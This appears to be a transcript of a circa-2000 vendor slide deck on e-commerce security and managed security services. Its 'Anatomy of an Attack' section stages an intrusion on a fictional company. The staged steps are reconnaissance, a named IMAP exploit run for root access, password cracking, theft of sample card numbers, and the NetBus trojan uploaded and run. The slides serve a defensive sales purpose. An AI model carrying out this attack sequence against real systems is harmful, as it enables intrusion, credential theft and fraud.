protecting the digital economy david gerulski director of marketing internet security systems
TRANSCRIPT
Protecting The Digital EconomyProtecting The Digital Economy
David GerulskiDavid GerulskiDirector of MarketingDirector of Marketing
Internet Security SystemsInternet Security Systems
Agenda
• Introduction• E-Commerce Security Drivers• Developing a Security Policy• Anatomy of an Attack• Policy Enforcement• Enterprise Risk Management• Security Resources• Conclusion
ISS Overview
• Headquartered in Atlanta, GA, USA
• Pioneered vulnerability assessment and intrusion detection technology
• Leader in Enterprise Security Management
• Publicly traded on NASDAQ: ISSX
• Industry leading technology 35+ product awards
• 1,000+ employee owners worldwide
• Over 300 certified security partners
• Over 7,500 customers worldwide
ISS Market Share
Source: International Data Corporation (IDC), August 1999
NetworkVulnerability Assessment
Market
NetworkIntrusion Detection
Market
NetworkIntrusion Detection & Assessment Market
Business Is Changing
Source: Forrester Research, Inc.
Access is granted to employees only
Applications and data are centralized in fortified IT bunkers
Security manager decides who gets access
Internal Focus
Centralized Assets
The goal of security is to protect against confidentiality
breaches
Prevent Losses
IT Control
Yesterday
Suppliers, customers, and prospects all need some
form of access
Applications and data are distributed across servers,
locations, and business units
The goal of security is to enable eCommerce
Business units want the authority to grant access
External Focus
Distributed Assets
Generate Revenue
Business Control
Today
The Threat Grows
Source: 1998 Computer Security Institute/FBI Computer Crime and Security Survey
38%47% 54%
60%
40%
20%
1996 1997 1998
E-Commerce Issues
Principle Business Drivers
• Increase Revenue
• Increase Profitability
Principle Security Drivers
• Greater Susceptibility to Attack
• Greater Probability of Catastrophic Consequences
• Much Greater “Loss to Incident” Ratio
Our Strength Is Our Weakness
• In Touch With Anyone With a Modem
• Have an International Presence
• Partners Can Now Collaborate
• Leverage Web-based Supply Chain Technologies
• Employees Can Work From Home, at Night, Over
the Weekends, and on Holiday
• Application Servers Can Support Entire Divisions
DDoS Distributed Denial-of-Service
UNIXFirewall
Web Server
Router
NTUNIX NTUNIX
Company A
Company B
University A
Company C
Company D
Consequences
• Decreased Stockholder Equity
• 30 Seconds on CNN
• Damaged Image
• Exposure to legal liability
Consequences
• Decreased Employee Productivity
• Loss of Intellectual Property & Assets
• Inefficient Use of Resources
• Exposure to Legal Liability
• Decreased Stockholder Equity
• 30 Seconds on CNN
• Damaged Image
Summary
• E-Business is here to stay
• Networks are exposed and under attack
• There’s no more turning a “blind eye”
• It’s a business issue and it should be treated in a
business-like manner
• Implement a security program not a security
technology
Developing a Security PolicyA Blueprint for Success
Developing a Security PolicyA Blueprint for Success
Security Policy
• Blue Print for Good Security Program
• Standards Based - British Standard 7799
• Management Buy In
• High Level to Technical
• Business Driven Not Vendor Driven
• Non-Static
Enforced Security Policy
• Minimize Exposure to Vulnerabilities
• Prepare for Attacks on Our Systems
• Manage Internal Staff Behavior
• Manage External Access and Activity
• Maintain Appropriate Security Configurations& Response Strategies
• Exploit Built-in Security Features
• Measure and Record Patterns and Trends for Future Security Planning
Registrant :Big Widget, Inc. (BIGWIDGET_DOM) 1111 Big Widget Drive Really Big, CA 90120 US
Domain Name: BIGWIDGET.COM
Administrative Contact, Technical Contact: Zone Contact, Billing Contact: Simms, Haywood (HS69) Dodge, Rodger (RD32) [email protected] [email protected] 1111 Big Widget Drive, UMIL04-07 1111 Big Widget Drive, UMIL04-47 Really Big, CA 90210 Really Big, CA 90210 678-443-6001 678-443-6014
Record last updated on 24-June-2000Record expires on 20-Mar-2010Record created on 14-Mar-1998Database last updated on 7-Jun-2000 15:54
Domain servers in listed order:
EHECATL.BIGWIDGET.COM 208.21.0.7NS1-AUTH.SPRINTLINK.NET 206.228.179.10NS.COMMANDCORP.COM 130.205.70.10
~$ telnet bigwidget.com 25
Trying 10.0.0.28...
Connected to bigwidget.com
Escape character is '^]'.
hacker:
hacker:~$
Connection closed by foreign host.
telnet bigwidget.com 143
Trying 10.0.0.28...
Connected to bigwidget.com. * OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT)(Report problems in this server to [email protected])
. logout
* BYE bigwidget IMAP4rev1 server terminating connection. OK LOGOUT completed
Connection closed by foreign host.
hacker ~$ ./imap_exploit bigwidget.com
IMAP Exploit for Linux.Author: Akylonius ([email protected])Modifications: p1 ([email protected])
Completed successfully.
hacker ~$ telnet bigwidget.com
Trying 10.0.0.28...
Connected to bigwidget.com.
Red Hat Linux release 4.2 (Biltmore)Kernel 2.0.35 on an i686
root
bigwidget:~# whoami
root
bigwidget:~# cat ./hosts
127.0.0.1 localhost localhost.localdomain208.21.2.10 thevault accounting208.21.2.11 fasttalk sales208.21.2.12 geekspeak engineering208.21.2.13 people human resources208.21.2.14 thelinks marketing208.21.2.15 thesource information systems
bigwidget:~# cd /etc
bigwidget:~# rlogin thevault
login:
Allan B. Smith 6543-2223-1209-4002 12/99Donna D. Smith 6543-4133-0632-4572 06/98Jim Smith 6543-2344-1523-5522 01/01Joseph L.Smith 6543-2356-1882-7532 04/02Kay L. Smith 6543-2398-1972-4532 06/03Mary Ann Smith 6543-8933-1332-4222 05/01Robert F. Smith 6543-0133-5232-3332 05/99
thevault:~#
cat visa.txt
cd /data/creditcards
thevault:~#
thevault:~# crack /etc/passwd
Cracking /etc/passwd...
username: bobman password: nambobusername: mary password: maryusername: root password: ncc1701
thevault:~# ftp thesource
Connected to thesource220 thesource Microsoft FTP Service (Version 4.0).
Name: administrator
331 Password required for administrator.
Password: *******
230 User administrator logged in.
Remote system type is Windows_NT.
ftp> cd \temp
250 CDW command successful.
ftp> send netbus.exe
local: netbus.exe remote: netbus.exe
200 PORT command successful.150 Opening BINARY mode data connection for netbus.exe226 Transfer complete.
ftp>
ftp>
quit
thevault:~$ telnet thesource
Trying 208.21.2.160... Connected to thesource.bigwidget.com.Escape character is '^]'.
Microsoft (R) Windows NT (TM) Version 4.00 (Build 1381)
Welcome to MS Telnet ServiceTelnet Server Build 5.00.98217.1login: administrator
password: *******
*===============================================================Welcome to Microsoft Telnet Server.*===============================================================C:\> cd \temp
C:\TEMP> netbus.exe
Connected to the.source.bigwidget.com
NetBus 1.6, by cf
Screendump
David Smith < [email protected] >
My Raise < URGENT >
Dear Mr. Smith
I would like to thank you for the huge raise that you have seen fit to give me. With my new salary of $350,000.00 a year I am sure I am the highest paid mail clerk in the company. This really makes me feel good because I deserve it.
Your Son,
Dave
David Smith
Anatomy of the Attack
BigWidget’s Network
UNIXFirewall
E-Mail Server
Web Server
Router
NT
Clients & Workstations
Network
UNIX NTUNIX
imapimap
CrackCrack NetBusNetBus
IT Infrastructure
Firewall
E-Mail Server
Web Server
Router
Servers
Clients & Workstations
Network
What Is Vulnerable?
Applications
Router
E-CommerceWeb Server
E-Mail Server
Firewall
SAP Peoplesoft
Web Browsers
What Is Vulnerable?
Firewall
AIX
Solaris
Router
Windows NT
Network
Operating Systems
HP-UX
Windows 95 & NT
What Is Vulnerable?
Vulnerability Assessment Service
corrective action reportcorrective action report
Vulnerability:
Severity:
IP Address:
OS:
Fix:
GetAdmin
High Risk
215.011.200.255
Windows NT 4.0From the Start menu, choose Programs/Administrative Tools/User Manager. Under Policies/User Rights, check the users who have admin privileges on that host. Stronger action may be needed, such as reinstalling the operating system from CD. Consider this host compromised, as well as any passwords from any other users on this host. In addition, Apply the post-SP3 getadmin patch, or SP4 when available. Also refer to Microsoft Knowledge Base Article Q146965.txt.
Managed Intrusion Detection Service
EMAILALERT/
LOG
ATTACK DETECTED
RECORD SESSION
SESSIONTERMINATED
RECONFIGUREFIREWALL/
ROUTER
INTERNAL
ATTACKDETECTED
SESSIONLOGGED
49%Mismanagement
44%Both
Computer Security Institute Study 1998
Reasons for firewall breach:
7%Bad Technology Bad Technology
Mismanagement
Both
Why a managed solution?
Why Outsource?
• Network Security Is Complex
• Requires Specialized Skills and Dedicated Resources
• Difficulty in Hiring, Maintaining and Retaining IT Security Staff
• High Costs of Doing It on Your Own
Benefits of Using BellSouth’s Managed Security Services
• Enables organizations to establish and maintain security across the Internet, Intranet and Extranet– Less expensive
• Leverage an existing security infrastructure• Offers reliability and cost-effectiveness without having to
maintain 24x7 dedicated security staff • Scaleable and modular services enable increased
flexibility to upgrade services as needed– More Secure
• Based on a robust and proven security architecture• Utilizes best of breed technologies • Supported by a dedicated staff of security engineers.• Proven operational procedures ensure proper response
and escalation of security events • Round-the-clock real-time monitoring for full-time
protection• All critical Internet-based security needs are addressed
– Free’s up your resources to focus on other key company initiatives
BellSouth & ISS Value Proposition• BellSouth
– Trusted Business Partner
– Operational Excellence
– Highest levels of Customer Satisfaction
• Internet Security Systems (ISS)
– Security Expertise
– Market leader in security
• Together
– Best in class IP access and network security solutions to support your E-Business strategy